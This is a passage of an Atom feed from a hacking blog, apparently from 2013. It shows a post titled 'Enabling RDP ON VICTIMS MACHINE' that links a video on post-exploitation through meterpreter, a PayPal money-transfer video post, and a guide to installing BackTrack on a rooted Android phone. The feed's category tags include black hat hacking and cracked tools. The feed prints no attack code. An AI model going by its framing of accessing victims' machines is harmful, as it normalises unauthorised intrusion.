<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3130564110394933894</id><updated>2013-12-08T16:04:07.070+05:00</updated><category term="Hacking"/><category term="Videos"/><category term="Network Hacking"/><category term="web hacking"/><category term="Pentesting"/><category term="Metasploit"/><category term="Web Pentesting"/><category term="networking"/><category term="security"/><category term="Web Penetration"/><category term="Assembly Language"/><category term="Languages"/><category term="web security"/><category term="Dorks"/><category term="Script/Tools"/><category term="penetration testing"/><category term="web application hacking"/><category term="web server"/><category term="network penetration testing"/><category term="Buffer Overflow"/><category term="Programming"/><category term="Virus"/><category term="Web Penetration testing"/><category term="backtrack"/><category term="c-or-c++"/><category term="network"/><category term="sql injection"/><category term="web application penetration testing"/><category term="web application security"/><category term="C Language"/><category term="Ip"/><category term="Kernel exploits"/><category term="Shell Uploading"/><category term="Vulnerables And Injected"/><category term="anti-virus"/><category term="black hat hacking"/><category term="blogger seo"/><category term="blogging"/><category term="computer hacking"/><category term="computer tricks"/><category term="cracked tools"/><category term="download collection"/><category term="ebooks"/><category term="exploit coding techniques"/><category term="exploits"/><category term="google hack"/><category term="hotspot shield cracked"/><category term="linux"/><category term="network pentesting"/><category term="pc speed"/><category term="root exploits"/><category term="server"/><category term="sql injection double query eror based"/><category term="sql language"/><category term="video"/><category term="virus scan"/><category term="web cam hacking"/><category term="web hacking techniques"/><category term="wifi hacking"/><category term="wifi security"/><category term="xamp"/><title type='text'>Blackleets - White Hat Hackers</title><subtitle type='html'>This blog is not to learn Black Hat hacking in negative ways. But for education purposes only. but for White Hat hacking, Cracking, Coding, programming, hacking for beginners, Starting hacking and security, web application security.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.blackleets.net/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Zulqurnain jutt</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-HSAoE5GzcBw/AAAAAAAAAAI/AAAAAAAAAmc/bSI9couD7ho/s512-c/photo.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>81</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-1295981547530358701</id><published>2013-05-18T21:51:00.003+05:00</published><updated>2013-11-12T07:59:28.794+05:00</updated><title type='text'>Transfer Money From a Bank Account to a PayPal Account </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-BY4O1BXGESc/UZexeQ6y24I/AAAAAAAAAI0/1lIQHXc5uNg/s1600/paypal.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;221&quot; src=&quot;http://2.bp.blogspot.com/-BY4O1BXGESc/UZexeQ6y24I/AAAAAAAAAI0/1lIQHXc5uNg/s320/paypal.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h4 style=&quot;text-align: center;&quot;&gt;SALLAM its me Soldier Of God. Today i will be sharing with a very helpful tutorial&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/h4&gt;&lt;h4 style=&quot;text-align: center;&quot;&gt;Transferring money from bank to paypal , verifying your paypal account, and then re sending money to&lt;/h4&gt;&lt;h4 style=&quot;text-align: center;&quot;&gt;any third party.&lt;/h4&gt;&lt;h4 style=&quot;text-align: center;&quot;&gt;&amp;nbsp;http://www.youtube.com/watch?v=j7Q5_IuFoGE&lt;/h4&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/1295981547530358701/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/05/transfer-money-from-bank-account-to.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/1295981547530358701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/1295981547530358701'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/05/transfer-money-from-bank-account-to.html' title='Transfer Money From a Bank Account to a PayPal Account '/><author><name>AITEZAZ</name><uri>http://www.blogger.com/profile/13261610296246899287</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/-LmkLqjCLoMk/T4psPUrssYI/AAAAAAAAAAQ/u-Zz14uJZK4/s220/boy18.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-BY4O1BXGESc/UZexeQ6y24I/AAAAAAAAAI0/1lIQHXc5uNg/s72-c/paypal.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6182390920750566340</id><published>2013-04-28T17:01:00.001+05:00</published><updated>2013-11-12T08:00:32.684+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit"/><title type='text'>Enabling RDP ON VICTIMS MACHINE</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-CJBeOMlruKg/UX0POSTeeLI/AAAAAAAAAGk/S3AeNhCSe0o/s1600/Network-Remote-Desktop.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-CJBeOMlruKg/UX0POSTeeLI/AAAAAAAAAGk/S3AeNhCSe0o/s1600/Network-Remote-Desktop.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&amp;nbsp;Hey Guys !&lt;br /&gt;Its me Aitezaz Known as Soldier Of God (SOG)&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;After Opening a Successful meterpreter session on victim&#39;s machine how to Enable RDP. &lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;VIDEO LINK = http://www.youtube.com/watch?v=d-_cD2DgMFQ&lt;/h3&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6182390920750566340/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/04/enabling-rdp-on-victims-machine.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6182390920750566340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6182390920750566340'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/04/enabling-rdp-on-victims-machine.html' title='Enabling RDP ON VICTIMS MACHINE'/><author><name>AITEZAZ</name><uri>http://www.blogger.com/profile/13261610296246899287</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/-LmkLqjCLoMk/T4psPUrssYI/AAAAAAAAAAQ/u-Zz14uJZK4/s220/boy18.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-CJBeOMlruKg/UX0POSTeeLI/AAAAAAAAAGk/S3AeNhCSe0o/s72-c/Network-Remote-Desktop.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-7260436351569797798</id><published>2013-03-28T13:47:00.002+05:00</published><updated>2013-11-12T08:02:33.023+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="backtrack"/><category scheme="http://www.blogger.com/atom/ns#" term="linux"/><title type='text'>Install Backtrack In Android Device full guide</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-ofIEkDS1T7U/UoGaQfdRvuI/AAAAAAAAAM8/hJsEBcimXJk/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-ofIEkDS1T7U/UoGaQfdRvuI/AAAAAAAAAM8/hJsEBcimXJk/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;This thread is written by &lt;span style=&quot;font-size: large;&quot;&gt;Dr.Zombie from &lt;a href=&quot;http://madleets.com/&quot; target=&quot;_blank&quot;&gt;Madleets Security team&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: black;&quot;&gt;Hello guys, today I&#39;m going to show you the easiest way to install backtrack on an android device.&lt;br /&gt;For this tutorial you need:&lt;/span&gt;&lt;/i&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp; -&amp;nbsp; Rooted android device&lt;br /&gt;&amp;nbsp; - Linux installer (Can be found on Google play)&lt;br /&gt;&amp;nbsp; -&amp;nbsp; Zarchiver (Can be found on Google play)&lt;br /&gt;&amp;nbsp; -&amp;nbsp; Busybox (Can be found on Google play)&lt;br /&gt;&amp;nbsp; -&amp;nbsp; Android-VNC (Can be found on Google play)&lt;br /&gt;&amp;nbsp; -&amp;nbsp; Terminal Emulator (Can be found on Google play)&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;(All of the programs mentioned above are free.)&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;Ok, now let&#39;s start:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;*&lt;/span&gt; The first thing you need to do is install Busybox from Google play:&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Gvi4aI6s_Io/UUki8pu5TjI/AAAAAAAAAkc/01HzkrfHFOg/s1600/Screenshot_2013-03-19-21-29-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://3.bp.blogspot.com/-Gvi4aI6s_Io/UUki8pu5TjI/AAAAAAAAAkc/01HzkrfHFOg/s320/Screenshot_2013-03-19-21-29-49.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;(AS you can see in the pic above)&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;* Install it, then open it when it&#39;s done, it will install some more&amp;nbsp; things.&lt;br /&gt;When it&#39;s done, install Linux Installer from Google Play:&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-vbF-aaGFMWg/UUkjR2YYdSI/AAAAAAAAAl0/So7ijVAzMn4/s1600/Screenshot_2013-03-19-21-22-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://3.bp.blogspot.com/-vbF-aaGFMWg/UUkjR2YYdSI/AAAAAAAAAl0/So7ijVAzMn4/s320/Screenshot_2013-03-19-21-22-29.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-qfynCDTSk6U/UUkl1cEyaSI/AAAAAAAAAl4/OiwlQaj1Nk0/s1600/Screenshot_2013-03-19-21-57-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;* Open Linux installer, then click on Install Guides from the list on your right hand side:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-qfynCDTSk6U/UUkl1cEyaSI/AAAAAAAAAl4/OiwlQaj1Nk0/s1600/Screenshot_2013-03-19-21-57-37.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://3.bp.blogspot.com/-qfynCDTSk6U/UUkl1cEyaSI/AAAAAAAAAl4/OiwlQaj1Nk0/s320/Screenshot_2013-03-19-21-57-37.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;When you click that, you&#39;ll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-RwqhxLBK_W0/UUkjJJMIu7I/AAAAAAAAAlM/Wxkbzp7E_1Y/s1600/Screenshot_2013-03-19-21-23-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://1.bp.blogspot.com/-RwqhxLBK_W0/UUkjJJMIu7I/AAAAAAAAAlM/Wxkbzp7E_1Y/s320/Screenshot_2013-03-19-21-23-20.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Just click on &quot;Download Image&quot;, and let it finish downloading.&lt;br /&gt;While it&#39;s downloading, open Google play and install Terminal Emulator, and Zarchiver.&lt;br /&gt;&lt;br /&gt;Terminal Emulator:&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-7ap0cjIDtbw/UUkjQm7XSgI/AAAAAAAAAls/6vNs1bDqS-I/s1600/Screenshot_2013-03-19-21-25-42.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-7ap0cjIDtbw/UUkjQm7XSgI/AAAAAAAAAls/6vNs1bDqS-I/s320/Screenshot_2013-03-19-21-25-42.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;Zarchiver&lt;/i&gt;&lt;/span&gt;:&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-QjowpcrzT48/UUkjHRndDiI/AAAAAAAAAlE/luJCVKkY0us/s1600/Screenshot_2013-03-19-21-26-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-QjowpcrzT48/UUkjHRndDiI/AAAAAAAAAlE/luJCVKkY0us/s320/Screenshot_2013-03-19-21-26-48.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;* When it finishes downloading, open Zarchiver, and look for the ZIP file that you downloaded, and extraxt the image into a root folder called &quot;backtrack&quot;, extract the image into an external memory card not the internal one.&lt;br /&gt;Once it&#39;s done, open Linux Installer again, and click on launch, you&#39;ll get a screen that looks like this:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-VKqI7vWdzZ8/UUkjFLwwIiI/AAAAAAAAAk8/fgJj3ONl8is/s1600/Screenshot_2013-03-19-21-31-44.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-VKqI7vWdzZ8/UUkjFLwwIiI/AAAAAAAAAk8/fgJj3ONl8is/s320/Screenshot_2013-03-19-21-31-44.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;If it didn&#39;t recognize any distro, click on Setting &amp;gt; Edit then change the file path there to your backtrack image, the .img file that you extracted.&lt;br /&gt;When it finally say &quot;backtrack&quot; on the drop down list, click &quot;Start Linux&quot;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it&#39;s done you will get a red &quot;root@localhost~#&quot; like the picture bellow:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-P5slh3K6Vgk/UUkjNIpjAII/AAAAAAAAAlc/Q-MZgZzWQ0A/s1600/Screenshot_2013-03-19-21-31-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://1.bp.blogspot.com/-P5slh3K6Vgk/UUkjNIpjAII/AAAAAAAAAlc/Q-MZgZzWQ0A/s320/Screenshot_2013-03-19-21-31-08.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;You are now in backtrack! &lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;Now if you want backtrack in GUI, open Google play, and install Android VNC:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-wKu49NxSr3I/UUkjB83STjI/AAAAAAAAAks/78mVbpd7x-E/s1600/Screenshot_2013-03-19-21-25-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-wKu49NxSr3I/UUkjB83STjI/AAAAAAAAAks/78mVbpd7x-E/s320/Screenshot_2013-03-19-21-25-01.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;Open It when it finishes installing, and it will look like this:&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-5aZX8YybqyY/UUki6o4aaCI/AAAAAAAAAkU/-et_5U5nyEM/s1600/Screenshot_2013-03-19-21-32-08.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://1.bp.blogspot.com/-5aZX8YybqyY/UUki6o4aaCI/AAAAAAAAAkU/-et_5U5nyEM/s320/Screenshot_2013-03-19-21-32-08.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;* &lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-7Em5Wx1kIZk/UUkjLNB3lNI/AAAAAAAAAlU/k1Ka-BUXUYk/s1600/Screenshot_2013-03-19-21-32-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-7Em5Wx1kIZk/UUkjLNB3lNI/AAAAAAAAAlU/k1Ka-BUXUYk/s320/Screenshot_2013-03-19-21-32-45.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Settings for VNC are&lt;span style=&quot;font-size: large;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;Username: backtrack&lt;br /&gt;Password: backtrac&lt;br /&gt;IP: from the &quot;ifconfig&quot; command or just put 127.0.0.1&lt;br /&gt;Color Format: 24-bit&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;/blockquote&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Now click connect, and boom! You&#39;r in backtrack Desktop!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;When you finis using it, remember to disconnect VNC AND exit backtrack in Terminal Emulator, else it will be taking your battery in the background.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change.&lt;br /&gt;&lt;br /&gt;That&#39;s it guys, enjoy!&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;background-color: 